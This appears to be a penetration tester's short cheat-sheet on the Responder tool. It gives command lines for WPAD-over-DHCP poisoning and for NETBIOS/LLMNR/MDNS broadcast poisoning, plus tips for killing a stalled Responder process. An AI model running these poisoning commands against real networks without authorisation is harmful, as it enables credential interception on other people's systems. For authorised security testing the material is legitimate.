# Responder.py
[Responder](https://github.com/lgandx/Responder) is awesome at tricking systems into talking to other systems.

## Poisoning WPAD over DHCP
Laurent Gaffie has a nice [blog post](https://g-laurent.blogspot.com/2021/08/responders-dhcp-poisoner.html) about this feature:

```
responder.py -I eth0 -Pvd 
```

* *-P for ProxyAuth*
* *-d for DHCP*
* *-v for verbose* 

## Basic poisoning of NETBIOS/LLMNR/MDNS broadcasts
```
responder.py -I eth0 -Pv
```

## Killing a non-responding Responder
If your Responder ever stops...you know...Responder-ing, find the process running Python:

```
ps aux | grep python
```

You'll see a line that looks something like this:
```
root       29125  1.6  0.0  17772  6784 pts/1    S+   21:05   0:01 sudo python3 /opt/responder/Responder.py -I eth0 -Pv
```

The number next to root is the PID, and that's what you need to kill like so:

```
kill 29125
```

One of the reasons you might need to do this is because of this "spam" [issue I raised on GitHub](https://github.com/lgandx/Responder/issues/284).
